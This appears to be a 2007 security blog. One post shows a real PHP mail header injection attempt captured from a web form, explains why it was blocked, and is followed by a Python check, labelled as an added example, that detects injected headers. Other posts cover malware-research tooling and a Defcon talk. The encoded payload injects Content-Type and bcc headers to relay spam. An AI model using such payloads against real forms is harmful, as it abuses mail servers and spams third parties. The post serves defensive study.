Thursday, August 09, 2007
Sample PHP Email Injection from a real Attacker
This posting has been in my drafts for over a year. It's really interesting to see how PHP mail injection is done in the wild. Hopefully Michael doesn't mind me posting details - if he does it's not a problem since I'm sure he doesn't read these posts. :)
---------------------------------------------------------------------------
Here is a PHP email injection attempt captured "in the wild". This attack was against the same script that was exploited in PHP Email Injection Step by Step.
The attack wasn't successful for two reasons. First, mod_security was used to block certain tell-tale signs of PHP email injection (injected mail headers such as Content-Type and bcc in a form field). Second, the script limits the "name" field to a reasonable length, which this attempt exceeded.
---------------------------------------------------------------------------
text=stood8261%40spree.mnin.org&
email=stood8261%40spree.mnin.org&
Submit=stood8261%40spree.mnin.org&
name=him%0D%0AContent-Type%3A+multipart%2Fmixed%3B+boundary%3D3cde64db239a99d3c03a2b3399a85a90%0AMIME-Version%3A+1.0%0ASubject%3A+to+himsilf%2C+a+habit+iv+dog%0Abcc%3A+charleses3229%40aol.com%0A%0AThis+is+a+multi-part+message+in+MIME+format.%0A%0A--3cde64db239a99d3c03a2b3399a85a90%0AContent-Type%3A+text%2Fplain%3B+charset%3D%22us-ascii%22%0AMIME-Version%3A+1.0%0AContent-Transfer-Encoding%3A+7bit%0A%0Amay+remember+at+tto+s+visit%0A--3cde64db239a99d3c03a2b3399a85a90--%0A%0D%0A.%0D%0A
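As an added example (not code from the original post), here is a Python check in the spirit of the two defences that stopped this attempt: it decodes a constructed request body shaped like the captured one (placeholder addresses and boundary, not the real values), flags CR/LF and injected header names in the fields the form script copies into mail headers, and enforces a length limit on "name". The 64-character limit and the set of header-bound fields are assumptions.

```python
import re
from urllib.parse import parse_qs

# Constructed request body in the same shape as the captured attempt above;
# addresses and the MIME boundary are placeholders, not the captured values.
SAMPLE_BODY = (
    "text=user%40example.invalid&"
    "email=user%40example.invalid&"
    "Submit=user%40example.invalid&"
    "name=him%0D%0AContent-Type%3A+multipart%2Fmixed%3B+boundary%3Ddeadbeef%0A"
    "MIME-Version%3A+1.0%0ASubject%3A+hello%0Abcc%3A+third%40example.invalid%0A%0A"
    "This+is+a+multi-part+message+in+MIME+format."
)

NAME_MAX_LEN = 64                    # assumed limit; the post only says "a reasonable number"
HEADER_FIELDS = ("name", "email")    # assumed: fields the form script copies into mail headers
# A header name at the start of a line inside a form value is the tell-tale sign of
# mail header injection (the kind of token a mod_security rule would match on).
INJECTED_HEADER = re.compile(r"^(?:content-type|mime-version|subject|bcc|cc|to)\s*:", re.I | re.M)


def parse_form(body):
    """Decode an application/x-www-form-urlencoded body into {field: first value}."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def inspect_fields(fields):
    """Return (field, reason) findings; an empty list means the submission is clean."""
    findings = []
    for field in HEADER_FIELDS:
        value = fields.get(field, "")
        if "\r" in value or "\n" in value:
            findings.append((field, "CR/LF in a header-bound field"))
        for match in INJECTED_HEADER.finditer(value):
            findings.append((field, "injected header: " + match.group(0).rstrip(":").strip()))
    name_len = len(fields.get("name", ""))
    if name_len > NAME_MAX_LEN:
        findings.append(("name", f"length {name_len} exceeds limit {NAME_MAX_LEN}"))
    return findings


def is_safe(body):
    """True when a raw form body passes both checks and may be handed to mail()."""
    return not inspect_fields(parse_form(body))


if __name__ == "__main__":
    for field, reason in inspect_fields(parse_form(SAMPLE_BODY)):
        print(f"{field}: {reason}")
    print("clean submission accepted:", is_safe("name=Alice&email=alice%40example.invalid&text=hi"))
```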
Labels: php mail injection
Wednesday, August 08, 2007
4 Reasons OSX is not ready for Malware Research
I love my MacBook Pro. I really, really, really want it to be my primary research machine. Right now it sits between my Inspiron 9400 running Windows XP and my 5 year old clone running Fedora Core 6.
After 3 months of trying to use it for my research machine I'm resigned back to Windows and Linux. Mac OS X just doesn't have the right stuff for malware research.
Here's why I think it's not ready yet:
1) Networking - Lack of strong networking support in virtualization products. I've tested both Parallels (2 and 3) and VMware Fusion. Both support multiple virtual NICs and allow you to assign IP addresses. Both fail to offer the kernel-level networking support of Linux tied into the virtual interfaces. For example, on Linux I can use iptables on the host to restrict traffic on virtual interfaces. Not so with ipfw on OS X and Parallels. Also, where are the virtual networking config scripts for OS X?
2) Disk Image Support - Parallels offers an explorer tool that can view any type of image through a GUI. It works wonderfully. It doesn't let me mount the disk in a way that allows systematic processing of the disk image. VMware makes a nice virtual disk mount application for Linux and Windows but not OS X.
3) Headless support - VMware offers headless support on both Windows and Linux, which saves tons of time with 4 research machines. No need to sit in front of the machine running the VM to do simple GUI interactions. No such option for OS X.
4) Video capture - VMware supports full-screen video capture of guests on Linux and Windows but not OS X. Parallels does not offer video capture either. Sometimes a screenshot just isn't enough.
Tuesday, August 07, 2007
Defcon 15 presentation now online
"Beyond Vulnerability Scanning - Extrusion and Exploitability Scanning" is now online at http://www.eescan.net/downloads/DC15.pdf.
Many thanks to all who attended. Please feel free to send any feedback to:
Matt Richard - Extrusion and Exploitability Scanning
mrichard@verisign.com or matt.richard@gmail.com
Fred Doyle - Risk Metrics
fdoyle@verisign.com
Labels: eescan